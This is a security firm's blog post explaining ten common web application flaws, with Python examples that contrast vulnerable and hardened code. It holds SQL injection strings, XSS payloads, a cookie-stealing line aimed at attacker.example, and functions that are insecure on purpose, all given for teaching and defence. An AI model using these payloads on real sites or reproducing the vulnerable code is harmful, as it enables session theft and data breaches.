A major component of an application security review is checking for the OWASP Top 10 vulnerabilities. cyberSecurist goes beyond that official list when reviewing applications. This blog post covers the ten vulnerability classes that attackers exploit most often and that cyberSecurist found most frequently in the application penetration tests it completed during 2022; the list also draws on the CWE Top 25.
1. Broken access control
Broken access control happens when restrictions on what users are allowed to do are not properly enforced.
Access control determines whether the user is allowed to carry out the action that they are attempting to perform. Design and management of access controls is a complex and dynamic problem that applies business, organizational, and legal constraints to technical implementation. Access control design decisions have to be made by humans, not technology, and the potential for errors is high.
Access controls can be of the following types:
- Vertical Access Controls: Different types of users have access to different application functions. For example, an administrator might be able to modify or delete any user's account, while an ordinary user has no access to these actions.
- Horizontal Access Controls: Different users have access to a subset of resources of the same type. For example, a banking application will allow a user to view transactions and make payments from their own accounts, but not the accounts of any other user.
2. Broken authentication
Authentication breaks when functions related to authentication and session management are designed or implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens and thereby take over user identities and the data those identities can reach. Broken authentication covers weaknesses in two areas: session management and credential management.
For example, a web application that accepts weak or easy-to-guess passwords such as "Admin@123", or that issues session tokens that are predictable, never expire, or are not rotated after login.
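As an added example (not code from the original post), the following Python shows both halves of broken authentication: a credential check that rejects "Admin@123" even though it satisfies the usual composition rules, and a server-side session store that uses unguessable tokens, expires them, and rotates the token at login so a pre-planted token is never upgraded to an authenticated session. The denylist entries, the 12-character minimum, and the 30-minute lifetime are assumptions made for the example, not cyberSecurist's recommendations.

```python
import secrets
import time
from typing import Callable, Dict, Optional, Tuple

# Constructed denylist. A deployment loads a large breached-password list
# instead of these few entries.
COMMON_PASSWORDS = {"admin@123", "password", "password1", "welcome1", "qwerty123", "123456"}
MIN_LENGTH = 12  # assumed policy value


def password_acceptable(password: str, username: str) -> Tuple[bool, str]:
    """Check a new password against a denylist, a minimum length, and the username.
    Composition rules alone are not enough: "Admin@123" has upper case, a symbol
    and digits and is still one of the first guesses an attacker makes."""
    if password.lower() in COMMON_PASSWORDS:
        return False, "password is on the common-password list"
    if len(password) < MIN_LENGTH:
        return False, f"too short (minimum {MIN_LENGTH} characters)"
    if username and username.lower() in password.lower():
        return False, "password contains the username"
    return True, "ok"


class SessionStore:
    """Server-side sessions keyed by an unguessable token, with expiry and rotation."""

    def __init__(self, ttl_seconds: int = 1800, clock: Callable[[], float] = time.monotonic):
        self.ttl = ttl_seconds
        self.clock = clock  # injectable so expiry can be exercised without sleeping
        self._sessions: Dict[str, Tuple[str, float]] = {}

    def create(self, username: str) -> str:
        # 256 bits from the OS CSPRNG; never a counter, timestamp or user ID.
        token = secrets.token_urlsafe(32)
        self._sessions[token] = (username, self.clock() + self.ttl)
        return token

    def login(self, old_token: Optional[str], username: str) -> str:
        """Rotate the session at authentication, so a token an attacker planted
        before login (session fixation) never becomes an authenticated session."""
        if old_token is not None:
            self._sessions.pop(old_token, None)
        return self.create(username)

    def user_for(self, token: str) -> Optional[str]:
        entry = self._sessions.get(token)
        if entry is None:
            return None
        username, expires_at = entry
        if self.clock() >= expires_at:
            del self._sessions[token]  # lifetime reached: the token is dead server-side
            return None
        return username

    def logout(self, token: str) -> None:
        # Invalidate on the server, not just by clearing the cookie in the browser.
        self._sessions.pop(token, None)


if __name__ == "__main__":
    print(password_acceptable("Admin@123", "admin"))
    store = SessionStore(ttl_seconds=60)
    anonymous = store.create("anonymous")
    authenticated = store.login(anonymous, "alice")
    print("old token still valid:", store.user_for(anonymous) is not None)
    print("new token maps to:", store.user_for(authenticated))
```

The clock is passed in so expiry can be checked deterministically; in production the default monotonic clock is used as-is.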
3. Sensitive data exposure
Sensitive data exposure occurs when a web application fails to protect sensitive information from disclosure to attackers, whether in transit, at rest, or in logs and error messages. This includes credit card data, session tokens, secret keys, medical history, Personally Identifiable Information (PII), and authentication credentials.
4. Injection
Injection is a web security vulnerability in which untrusted input becomes part of a query or command that an interpreter executes, letting the attacker change what the application asks its database, operating system, or other back end to do. Injection generally allows an attacker to view data that they are not normally able to retrieve, and it can also modify or delete that data or execute commands; the result is unauthorized access to sensitive data such as passwords, credit card details, or personal user information.
Examples include SQL injection, XPath injection, and OS command injection.
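The SQL injection case, as an added example that is not part of the original post: the same login lookup written with string formatting and with a parameterised query, run against an in-memory SQLite database. The table, rows and payloads are constructed for the example; plaintext passwords are used only to keep the injection demonstration short, and a real application stores password hashes.

```python
import sqlite3
from typing import List, Tuple


def make_db() -> sqlite3.Connection:
    """Constructed sample database with two users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("alice", "s3cret"), ("bob", "hunter2")],
    )
    conn.commit()
    return conn


def find_user_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> List[Tuple[int, str]]:
    """The user-controlled strings are spliced into the SQL text, so quotes,
    comment markers and boolean operators in them are parsed as SQL."""
    sql = (
        "SELECT id, username FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(sql).fetchall()


def find_user_safe(conn: sqlite3.Connection, username: str, password: str) -> List[Tuple[int, str]]:
    """Parameterised query: the SQL text is fixed and the driver sends the values
    separately, so the same payloads are compared as literal strings."""
    sql = "SELECT id, username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


# Constructed attacker inputs.
# 1) password field: closes the string and appends an always-true condition;
#    AND binds tighter than OR, so the WHERE clause becomes (... AND ...) OR '1'='1'.
BYPASS_PASSWORD = "' OR '1'='1"
# 2) username field: ends the statement early with a SQL line comment, so the
#    password check is never evaluated.
COMMENT_USERNAME = "alice'--"


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable, unknown user + OR payload :", find_user_vulnerable(conn, "nobody", BYPASS_PASSWORD))
    print("vulnerable, comment payload, no password:", find_user_vulnerable(conn, COMMENT_USERNAME, ""))
    print("safe, same payloads                    :", find_user_safe(conn, "nobody", BYPASS_PASSWORD),
          find_user_safe(conn, COMMENT_USERNAME, ""))
    print("safe, real credentials                 :", find_user_safe(conn, "alice", "s3cret"))
```

The second payload relies on `--` starting a comment, which SQLite, PostgreSQL and MySQL (with a following space) all accept; the first works in any SQL dialect. Neither reaches the database as SQL through the parameterised version.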
5. Security misconfiguration
Security misconfigurations are security controls that are set up incorrectly or left at insecure defaults, putting the system and its data at risk. Automated scanners are useful for detecting the common cases: default accounts or default configurations still in place, unnecessary services, legacy options left enabled, verbose error messages, and similar.
For example, a default account with its factory password is still enabled, so anyone who reads the vendor documentation can log in and exploit the system.
6. Insecure Direct Object References (IDOR)
An IDOR occurs when an application uses user-supplied input (an ID, filename, or key) to access an object directly, without checking that the requester is authorized to reach that object. IDOR vulnerabilities are most commonly associated with horizontal privilege escalation, but they can also arise in relation to vertical privilege escalation.
For example, user "A" owns the record with ID 100 and user "B" owns the record with ID 201. If the application looks up whatever ID appears in the request without an ownership check, user "A" can change 100 to 201 in the request and read user "B"'s record. The flaw lies in how the application references these objects, and it gives direct access to unauthorized resources.
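The following Python is an added example (not code from the original post) that serves both the broken access control section and this IDOR section: an account lookup that uses the request's ID directly, beside one that enforces the horizontal check (you may only read accounts you own) and the vertical check (only admins may read any account or delete users). The users, roles, account IDs and balances are constructed sample data, and the `Forbidden` exception and helper names are assumptions for the example.

```python
from dataclasses import dataclass
from typing import Callable, Dict


@dataclass(frozen=True)
class User:
    user_id: int
    role: str  # "user" or "admin"


class Forbidden(Exception):
    """Raised when the requester is not allowed to perform the action."""


# Constructed sample data. Account IDs are sequential and guessable, as in the
# example above where user A holds 100 and user B holds 201.
USERS: Dict[int, User] = {1: User(1, "user"), 2: User(2, "user"), 3: User(3, "admin")}
ACCOUNTS: Dict[int, dict] = {
    100: {"owner": 1, "balance": 500},
    201: {"owner": 2, "balance": 9000},
}


def get_account_vulnerable(requester: User, account_id: int) -> dict:
    """IDOR: the ID taken from the request is used directly and ownership is
    never checked, so any logged-in user can read any account."""
    return ACCOUNTS[account_id]


def get_account(requester: User, account_id: int) -> dict:
    """Horizontal access control: a user may read only the accounts they own.
    Vertical access control: an admin may read any account."""
    account = ACCOUNTS.get(account_id)
    not_owner = account is not None and account["owner"] != requester.user_id
    if account is None or (requester.role != "admin" and not_owner):
        # One response for "does not exist" and "not yours", so the attacker
        # cannot use the difference to enumerate valid account IDs.
        raise Forbidden("account not accessible")
    return account


def delete_user(requester: User, target_id: int) -> bool:
    """Vertical access control: deleting users is an admin-only function.
    The check is made on the server from the requester's session, never from
    a role field the client sends."""
    if requester.role != "admin":
        raise Forbidden("admin role required")
    return USERS.pop(target_id, None) is not None


def is_denied(action: Callable, *args) -> bool:
    """Helper for the demonstration: True when the action raises Forbidden."""
    try:
        action(*args)
    except Forbidden:
        return True
    return False


if __name__ == "__main__":
    alice, admin = USERS[1], USERS[3]
    print("vulnerable lookup lets alice read bob's account:", get_account_vulnerable(alice, 201))
    print("hardened lookup denies alice on 201:", is_denied(get_account, alice, 201))
    print("admin can read 201:", get_account(admin, 201))
    print("alice deleting user 2 is denied:", is_denied(delete_user, alice, 2))
```

The ownership check is the fix for the ID-swapping example in the text; the role check is what stops an ordinary user from calling an admin-only function even if they discover its URL.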
7. Business logic vulnerabilities
A business logic vulnerability is a flaw in the design or implementation of an application that lets an attacker elicit unintended behaviour. It allows attackers to manipulate legitimate functionality to achieve a malicious goal, and because the requests involved are syntactically valid, automated scanners rarely find these flaws.
For example, manipulating a critical parameter such as a price or quantity, validating each field on its own but not the logical relationship between them, or failing to handle unconventional input that the logic was never written for.
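The parameter-manipulation case, as an added example that is not from the original post: an order-total calculation that trusts the client's price and quantity fields, beside one that takes the price from the server's own catalogue and validates the quantity. The catalogue, prices and the 100-unit limit are constructed assumptions for the example.

```python
from typing import Dict, List, Union

# Constructed catalogue, prices in cents. The server's price list is the only
# source of truth; the client never gets to state a price.
CATALOG: Dict[str, int] = {"sku-1": 2500, "sku-2": 999}
MAX_QTY = 100  # assumed business rule


class InvalidOrder(ValueError):
    pass


def order_total_vulnerable(items: List[Dict]) -> int:
    """Trusts every field the client sends: price, quantity and SKU.
    A negative quantity turns the order into a refund; a price of 1 buys
    anything for a cent."""
    return sum(item["qty"] * item["price"] for item in items)


def order_total(items: List[Dict]) -> int:
    """Server-side validation of the logically related fields."""
    if not items:
        raise InvalidOrder("empty order")
    total = 0
    for item in items:
        sku = item.get("sku")
        if sku not in CATALOG:
            raise InvalidOrder(f"unknown sku {sku!r}")
        qty = item.get("qty")
        # bool is a subclass of int, so reject it explicitly; this also rejects
        # the unconventional inputs "2", 2.0, None and anything out of range.
        if isinstance(qty, bool) or not isinstance(qty, int) or not 1 <= qty <= MAX_QTY:
            raise InvalidOrder(f"quantity must be an integer between 1 and {MAX_QTY}")
        total += qty * CATALOG[sku]  # price comes from the catalogue, never the request
    return total


def checkout(items: List[Dict]) -> Union[int, str]:
    """Returns the total, or the rejection reason for callers that avoid exceptions."""
    try:
        return order_total(items)
    except InvalidOrder as exc:
        return f"rejected: {exc}"


if __name__ == "__main__":
    # Constructed tampered request: negative quantity on the expensive item.
    tampered = [{"sku": "sku-1", "qty": -3, "price": 2500}, {"sku": "sku-2", "qty": 1, "price": 999}]
    print("vulnerable total:", order_total_vulnerable(tampered))  # negative: a refund
    print("hardened total  :", checkout(tampered))
    print("honest order    :", checkout([{"sku": "sku-1", "qty": 2}, {"sku": "sku-2", "qty": 1}]))
```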
cyberSecurist Technologies provides comprehensive and cost-effective information and application security (infosec and appsec) assessment / assurance services to help you discover these vulnerabilities and adopt security best practices to prevent system compromise.
8. Enumeration issues
Enumeration is the process of extracting user names, machine names, network resources, shares and services from a system. Enumeration issues occur when an application responds differently for valid and invalid identifiers, letting a malicious actor use brute-force techniques to guess or confirm which user accounts exist.
For example, a login form that answers "user does not exist" for an unknown user but "the password is incorrect" for a known one hands the attacker a list of valid usernames to attack. The same leak can occur through password-reset and registration pages, or through a measurable difference in response time when the password check is skipped for unknown users.
9. Cross-site scripting (XSS)
XSS attacks enable attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy.
- Reflected XSS: the malicious script comes from the current HTTP request.
- Stored XSS: the malicious script comes from the website's database.
- DOM-based XSS: the vulnerability exists in client-side code rather than server-side code.
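As an added example (not from the original post), the following Python shows the reflected and stored cases and the fix for both: output encoding chosen for the context the untrusted value is written into. It uses only the standard library's `html.escape`; the page fragments and attacker payloads are constructed. DOM-based XSS lives in client-side JavaScript and is not shown here.

```python
import html
from typing import List


def search_page_vulnerable(query: str) -> str:
    """Reflected XSS: the query parameter is copied into the page unchanged."""
    return f"<p>Results for: {query}</p>"


def search_page(query: str) -> str:
    """Element-content context: html.escape neutralises <, >, & and quotes, so
    the browser renders the payload as text instead of parsing it as markup."""
    return f"<p>Results for: {html.escape(query)}</p>"


def search_box(query: str) -> str:
    """Attribute context: the value must sit inside quotes and have quotes
    escaped (quote=True is html.escape's default); otherwise a payload that
    starts with a quote breaks out of the attribute and adds an event handler."""
    return f'<input name="q" value="{html.escape(query, quote=True)}">'


def render_comments(comments: List[str]) -> str:
    """Stored XSS: comments come from the database, so they are just as untrusted
    as request input. Escape at output time, for the context being written into,
    rather than trusting that storage-time filtering caught everything."""
    return "<ul>" + "".join(f"<li>{html.escape(c)}</li>" for c in comments) + "</ul>"


# Constructed attacker payloads.
REFLECTED_PAYLOAD = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>'
ATTRIBUTE_PAYLOAD = '" autofocus onfocus="alert(document.domain)'
STORED_COMMENTS = ["Nice post!", "<img src=x onerror=alert(1)>"]


if __name__ == "__main__":
    print(search_page_vulnerable(REFLECTED_PAYLOAD))
    print(search_page(REFLECTED_PAYLOAD))
    print(search_box(ATTRIBUTE_PAYLOAD))
    print(render_comments(STORED_COMMENTS))
```

The same value needs different encoding in a JavaScript string, a URL or a CSS block; `html.escape` covers only HTML element and attribute content, which is why templating engines with context-aware auto-escaping are preferred over hand-built strings.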
10. Rate control
Rate limiting restricts how many requests a client may make in a given period. It is commonly keyed on the source IP address and the time between requests, because the IP address is the simplest way an application can identify who or what is making a request; limits should also be applied per account or per session, since attackers spread brute-force attempts across many IP addresses. If a bot can only make three or four login attempts per hour against an account, a password-guessing attack is statistically unlikely to succeed.
Missing rate control enables brute-force attacks and makes denial-of-service (DDoS) attacks easier.
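The following Python is an added example (not code from the original post) serving both the enumeration section and this one: a login function that returns one generic message and does the same amount of password-hashing work whether or not the username exists, fronted by a sliding-window rate limiter keyed on both the source IP and the target account. The user table, the PBKDF2 work factor, the three-per-hour limit and the message strings are constructed assumptions.

```python
import hashlib
import hmac
import os
import time
from collections import deque
from typing import Callable, Deque, Dict, Tuple

ITERATIONS = 50_000  # assumed PBKDF2 work factor; tune to the hardware


def hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)


# Constructed user table with one real account.
_SALT = os.urandom(16)
USERS: Dict[str, Tuple[bytes, bytes]] = {
    "alice": (_SALT, hash_password("correct horse battery staple", _SALT)),
}
# Dummy credential used for unknown usernames, so a failed login costs the same
# time whether or not the account exists (no timing-based enumeration).
_DUMMY_SALT = os.urandom(16)
_DUMMY_HASH = hash_password("dummy-placeholder", _DUMMY_SALT)

GENERIC_ERROR = "invalid username or password"
THROTTLED = "too many attempts, try again later"


class RateLimiter:
    """Sliding-window limiter: at most `limit` events per `window` seconds per key."""

    def __init__(self, limit: int, window: float, clock: Callable[[], float] = time.monotonic):
        self.limit, self.window, self.clock = limit, window, clock
        self._events: Dict[str, Deque[float]] = {}

    def allow(self, key: str) -> bool:
        now = self.clock()
        events = self._events.setdefault(key, deque())
        while events and events[0] <= now - self.window:
            events.popleft()  # drop attempts that fell out of the window
        if len(events) >= self.limit:
            return False
        events.append(now)
        return True


def login(username: str, password: str, client_ip: str, limiter: RateLimiter) -> Tuple[bool, str]:
    # Key the limit on the source IP *and* the target account: attackers spread
    # guesses across many IPs, so an IP-only limit does not protect one account.
    if not limiter.allow(f"ip:{client_ip}") or not limiter.allow(f"user:{username}"):
        return False, THROTTLED
    salt, expected = USERS.get(username, (_DUMMY_SALT, _DUMMY_HASH))
    candidate = hash_password(password, salt)  # always done, even for unknown users
    # compare_digest avoids leaking how many bytes matched. The membership test
    # is still required: without it, guessing the dummy password would "log in"
    # as any nonexistent user.
    if username in USERS and hmac.compare_digest(candidate, expected):
        return True, "ok"
    return False, GENERIC_ERROR  # same message for unknown user and wrong password


if __name__ == "__main__":
    limiter = RateLimiter(limit=3, window=3600)
    for attempt in [("alice", "wrong"), ("nobody", "wrong"), ("alice", "correct horse battery staple"),
                    ("alice", "correct horse battery staple")]:
        print(attempt[0], "->", login(attempt[0], attempt[1], "203.0.113.7", limiter))
```

The clock is injectable so the window can be advanced in a test; the response for "user does not exist" and "wrong password" is identical in both text and time, which is the property the enumeration section asks for.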